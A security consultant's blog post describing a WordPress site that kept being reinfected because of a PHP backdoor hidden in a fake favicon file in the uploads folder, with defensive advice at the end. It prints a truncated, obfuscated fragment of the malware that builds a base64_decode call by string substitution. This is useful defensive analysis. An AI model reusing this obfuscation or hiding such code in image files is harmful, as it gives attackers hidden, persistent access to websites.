I decided to write this article right away after an incident I had while securing one of my client’s websites that was getting re-infected once and again a few days after cleaned.
What is a backdoor?
In simple terms, a backdoor is malicious hidden code that allows an attacker to gain unauthorized access to a system, program application or website. Check the Wikipedia definition here.
An strange icon file where it was not supposed to be
After cleaning infections and stopping their propagation, I was confirming the WordPress folder and file structure was fine (for no data-loss). Everything was ok but I found an icon file named favicon_11axx.ico at wp-content/uploads/ folder. It was a bit strange an icon file was there because when you have a paid theme, it usually has a configuration panel where you upload logo and icon (also known as favicon), and if this was the site icon, the file should have been uploaded to some path like wp-content/uploads/{year}/{month}/{filename} as per default WordPress uploads path, so I tried to download the file to check it further, and my antivirus (Eset Security) inmediatly deleted the file throwing an alert saying it was infected with a trojan for PHP (the hidden backdoor I was looking for).
I deactivated my antivirus for 10 minutes, then downloaded the file and sent it to virustotal.com, where I got this:
Then I opened the file with my text editor, SublimeText (at this point it was obvious the file was not an icon or an image, and I found the next at the beginning of the file:
if (!defined('ALREADY_RUN_1bc29b36342a82aaf665878535618')){
define('ALREADY_RUN_1bc29b36342a82aaf665878535618', 1);
$wcoydw = 8335; function azyjngoo($dygol, $ruwyh){$qzzevn = ''; for($i=0; $i < strlen($dygol); $i++){$qzzevn .= isset($ruwyh[$dygol[$i]]) ? $ruwyh[$dygol[$i]] : $dygol[$i];} $zerbylhmp="base" . "64_decode";return $zerbylhmp($qzzevn);} $ixqservz = 'wOF17p0Z3k6L1VYsgMtsYNoZ3sgc1pjkhilLoF17pZq'. '3k6LVoZ3VeIJM9Z8MEM9yl17dw204XCa0J8FY1ygZCzWJ3kWICFTVfYtYN6XCTY9m1'.
//more code here
It was PHP code inside an image (an icon file in this case).
And how this malicious code was automatically executed?
With PHP you can do include('{path}/{filename}'); and the code in that file will be read, included and rendered because it's PHP code (the file extension does not matter so much in this case). And where this include code was? This was the second part of the infection, which usually comes obfuscated and/or encoded, like the next example (taken from Google):
Part of the string above can be encoded but I can quickly know that's a PHP include. If you decode the include path, it should get you to the trojan/backdoor or some other hidden infections (in this case, it was calling the fake favicon.ico file).
Pretty clever, huh? Well, maybe not that much, but, as the malware was inside an image file, some scanners couldn't find it 🙁
These hidden backdoors can keep infecting your website with new malware and they can grant control over your data to an attacker.
Here's a related article from Sucuri: https://blog.sucuri.net/2014/12/analyzing-the-wordpress-soaksoak-favicon-backdoor.html
My recommendations
- Is always a good idea to have a firewall that blocks not trusted requests to the site and database.
- Always make fully working backups on your side and do not fully rely on your hosting free backups tool (I tell you this by experience).
- Having your themes and plugins updated in the case of WordPress based sites.
- DO NOT install nulled plugins, themes as paid code snippets.
- Always research a bit on Google about what you're about to install in your website / application (whether is WordPress, another CMS or a framework).
